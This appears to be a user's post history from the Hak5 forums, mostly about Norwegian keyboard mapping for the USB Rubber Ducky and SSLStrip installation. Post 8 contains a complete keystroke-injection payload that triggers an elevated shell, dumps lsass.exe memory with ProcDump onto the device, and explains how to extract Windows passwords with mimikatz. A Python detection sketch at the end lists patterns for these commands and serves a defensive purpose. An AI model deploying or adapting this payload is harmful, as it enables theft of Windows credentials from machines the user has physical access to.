Everything posted by Hackman1970

  1. Executing 'which sslstrip':

         /usr/bin/sslstrip

     Got it working now, had to factory reset, then install SSLStrip from large tile and then I repeated steps for twisted web :-)
  2. Ordered mine on 10/13/2013 and it arrived at my home in Norway yesterday. Looking forward to playing with it :D
  3. This worked for me. I can now start sslstrip from console :) , but it still says not installed in web interface...
  4. To find out if more keys have problems with no.properties I made a script with all Norwegian keys:

         REM *** Testscript for norwegian keyboards ***
         REM *** Author: Hackman1970
         REM *** Editor: LeafPad
         REM *** Character Coding UTF-8
         REM *** Wait for detection of RubberDucky
         DELAY 2000
         GUI-R
         STRING notepad
         DELAY 500
         STRING ROW 1 OPEN : |1234567890+\
         ENTER
         STRING ROW 1 SHIFT : §!"#¤%&/()=?`
         ENTER
         STRING ROW 1 ALTGR : @£$ {[]}±'
         ENTER
         ENTER
         STRING ROW 2 OPEN : qwertyuiopå"
         ENTER
         STRING ROW 2 SHIFT : QWERTYUIOPÅ^
         ENTER
         STRING ROW 2 ALTGR : ¦ € ~
         ENTER
         ENTER
         STRING ROW 3 OPEN : asdfghjkløæ'
         ENTER
         STRING ROW 3 SHIFT : ASDFGHJKLØÆ*
         ENTER
         ENTER
         STRING ROW 4 OPEN : <zxcvbnm,.-
         ENTER
         STRING ROW 4 SHIFT : >ZXCVBNM;:_
         ENTER
         STRING ROW 4 ALTGR : ½
         ENTER

     Here's the encoder's output:

         root@kali-vb:/media/DUCKY# java -jar encoder.jar -l no.properties -i nbno_keys_UTF-8.txt -o inject.bin
         Hak5 Duck Encoder 2.6
         Loading File ..... [ OK ]
         Loading Keyboard File ..... [ OK ]
         Loading Language File ..... [ OK ]
         Loading DuckyScript ..... [ OK ]
         Char not found:ASCII_9
         Char not found:ASCII_9
         Char not found:ASCII_60
         Char not found:ASCII_9
         Char not found:ISO_8859_1_B1
         Char not found:ASCII_9
         Char not found:ASCII_9
         Char not found:ASCII_5E
         Char not found:ASCII_9
         Char not found:ISO_8859_1_A6
         Char not found:ASCII_9
         Char not found:ASCII_9
         Char not found:ASCII_9
         Char not found:ASCII_9
         Char not found:ASCII_9
         DuckyScript Complete..... [ OK ]
         root@kali-vb:/media/DUCKY#

     Here is the output:

         ROW 1 OPEN : |1234567890+\ OK
         ROW 1 SHIFT : §!"#¤%&/()=? MISSING ` = ( \ + SHIFT + SPACE )
         ROW 1 ALTGR : @£$ {[]}' OK
         ROW 2 OPEN : qwertyuiopå" OK
         ROW 2 SHIFT : QWERTYUIOPÅ MISSING ^ = ( ¨ + SHIFT + SPACE )
         ROW 2 ALTGR : € ~ OK
         ROW 3 OPEN : asdfghjkløæ' OK
         ROW 3 SHIFT : ASDFGHJKLØÆ* OK
         ROW 4 OPEN : <zxcvbnm,.- OK
         ROW 4 SHIFT : >ZXCVBNM;:_ OK
         ROW 2 ALTGR : | HAS CHANGED KEY
  5. Char not found:ASCII_5E in no.properties

     For Norwegian, this did not do the trick either:

         //ASCII_5E = KEY_RIGHT_BRACE, MODIFIERKEY_SHIFT + KEY_SPACE // 94 ^

     neither

         //ASCII_5E = DIAERESIS_BITS, MODIFIERKEY_SHIFT + KEY_SPACE // 94 ^

     In the US keymap your key } is in the same place as our ^

     Here is my output:

         root@kali-vb:/media/DUCKY# java -jar encoder.jar -l no.properties -i inject.txt -o inject.bin
         Hak5 Duck Encoder 2.6
         Loading File ..... [ OK ]
         Loading Keyboard File ..... [ OK ]
         Loading Language File ..... [ OK ]
         Loading DuckyScript ..... [ OK ]
         Char not found:ASCII_5E
         Char not found:ASCII_5E
         DuckyScript Complete..... [ OK ]
  6. Hello, I got my RubberDucky some days ago and have tested a bit in Norwegian. I ran into problems with ASCII_5E when this key ^ is in the script. Else I have not seen anything wrong yet... After some testing with no.properties I gave that up for now. This did not work:

         //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE // 94 ^

     Instead I tried to circumvent the problem, thinking the other way around: change the "victim's" keyboard to US English. In this post: https://forums.hak5.org/index.php?/topic/30210-payload-memory-dump-windows-recover-password-without-setting-off-av/ I have made a comment at the bottom of the page on how to do this until no.properties has been fixed.
  7. About this key ^ for Norwegian, Swedish and Danish, you may want to look at this post, see my comment at the bottom of the page: https://forums.hak5.org/index.php?/topic/30210-payload-memory-dump-windows-recover-password-without-setting-off-av/
  8. I had problems with Norwegian keyboards and this key ^ so I made some changes in the code to make it work in Norwegian. First I tried fixing no.properties for //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE, did not work for me. Instead of using no.properties I use US standard and make the computer change from Norwegian to US English. Have tested this on my Norwegian Windows 7 x64, worked perfectly for me :) Probably the way to go instead of dk.properties and se.properties too? Check out my modified code:

         REM Author: Hak5Darren with the help of:
         REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals, 7zip
         REM
         REM Modified to circumvent norwegian keyboards by Hackman1970
         REM
         REM Description: "Backup" Windows Passwords without setting off AntiVirus
         REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
         REM Passwords can later be extracted using mimikatz.
         REM
         REM Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
         REM card labeled "DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
         REM Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
         REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
         REM
         REM Include 7za.exe on root of DUCKY SD card. Download 7zip command line version from:
         REM http://www.7-zip.org/download.html
         REM
         REM Target: Windows Vista/7/8, Win32/x64
         REM *** UAC Bypass ***
         DELAY 2000
         WINDOWS r
         REM *** Input Language Swap to circumvent problems with norwegian
         REM *** Norwegian Windows 7 use to have US english as second language installed by default
         REM *** Using shortcut ALT-SHIFT to toggle between NO and US
         ALT-SHIFT
         DELAY 200
         STRING powershell Start-Process cmd.exe -Verb runAs
         ENTER
         DELAY 500
         REM *** For norwegian I tried to change y[es] to j[a]
         REM ALT y
         REM ALT j
         REM *** The above did not work but LEFTARROW ENTER works :)
         LEFTARROW
         ENTER
         DELAY 500
         REM *** Swap Input Language again for cmd.exe shell
         ALT-SHIFT
         DELAY 200
         REM *** Define DUCKY drive as %duck%
         ENTER
         STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
         ENTER
         DELAY 500
         REM *** Execute procdump from SD card, Save dump to %temp%, Compress dump with 7zip from SD card, Send archive to SD card, Delete dump from %temp%, Exit ***
         STRING %duck%\procdump.exe -accepteula -ma lsass.exe %temp%\%COMPUTERNAME%_lsass.dmp & %duck%\7za.exe a -t7z -mx9 "%duck%\%COMPUTERNAME%_lsass.7z" "%temp%\%COMPUTERNAME%_lsass.dmp" & del %temp%\%COMPUTERNAME%_lsass.dmp & exit
         ENTER
         REM *** Swap Input Language again hopefully back to norwegian
         ALT-SHIFT
         REM *** Post Exploitation ***
         REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a
         REM directory including the version of mimikatz for your targets architecture
         REM (NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
         REM (I had to use the one from \mimikatz\alpha\x64 for my Windows 7 x64 box:)
         REM mimikatz.exe <enter>
         REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
         REM sekurlsa::logonPasswords full <enter>

     Is this the way to go or does anyone have a fix for no.properties?
  9. Char not found:ASCII_5E in no.properties

     I have tried this in no.properties without any luck:

         //ASCII_5E = CIRCUMFLEX_BITS, MODIFIERKEY_SHIFT + KEY_SPACE // 94 ^

     On my keyboard this key lives on the upper left side of the ENTER key and it looks like this:

         -------
         | ^ |
         | ~ |
         | ¨ |
         -------

     I have to press SHIFT + ABOVE KEY + SPACE to get the letter ^. Is there someone out there that can give me a hint?
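
Seen from the detection side, the commands typed by the payload in post 8 leave process command lines that can be matched. The sketch below is an added example, not code from Hackman1970 or Hak5; the (host, command line) event format, the host names, the drive letter, the paths and the rule names are constructed for illustration.

```python
import re
from collections import defaultdict

# Rules derived from the commands typed by the payload quoted in post 8.
RULES = {
    "elevated_cmd_via_powershell": re.compile(
        r'powershell(\.exe)?\s.*Start-Process\s+cmd(\.exe)?\s.*-Verb\s+runAs', re.I),
    "lsass_full_dump": re.compile(
        r'procdump(64)?(\.exe)?\s.*[-/]ma\b.*\blsass(\.exe)?\b', re.I),
    "lsass_dump_archived": re.compile(
        r'\b7za?(\.exe)?\s+a\s.*lsass[^"\s]*\.dmp', re.I),
}

# Constructed sample events: (host, process command line). Not real telemetry.
SAMPLE_EVENTS = [
    ("WS01", r'powershell Start-Process cmd.exe -Verb runAs'),
    ("WS01", r'E:\procdump.exe -accepteula -ma lsass.exe C:\Users\a\AppData\Local\Temp\WS01_lsass.dmp'),
    ("WS01", r'E:\7za.exe a -t7z -mx9 "E:\WS01_lsass.7z" "C:\Users\a\AppData\Local\Temp\WS01_lsass.dmp"'),
    ("WS02", r'procdump.exe -ma w3wp.exe C:\dumps\w3wp.dmp'),  # dump of another process
    ("WS02", r'C:\Windows\System32\notepad.exe report.txt'),
]

def scan(events):
    """Return {host: sorted names of the rules that matched any command line}."""
    hits = defaultdict(set)
    for host, cmdline in events:
        for name, pattern in RULES.items():
            if pattern.search(cmdline):
                hits[host].add(name)
    return {host: sorted(names) for host, names in hits.items()}

def severity(rule_names):
    """A dump followed by archiving on one host is the full staging sequence."""
    names = set(rule_names)
    if {"lsass_full_dump", "lsass_dump_archived"} <= names:
        return "high"
    return "medium" if "lsass_full_dump" in names else "low"

if __name__ == "__main__":
    for host, names in scan(SAMPLE_EVENTS).items():
        print(host, severity(names), names)
```

Matching on the lsass target rather than on the ProcDump binary name alone keeps routine dumps of other processes, such as the WS02 sample, out of the results.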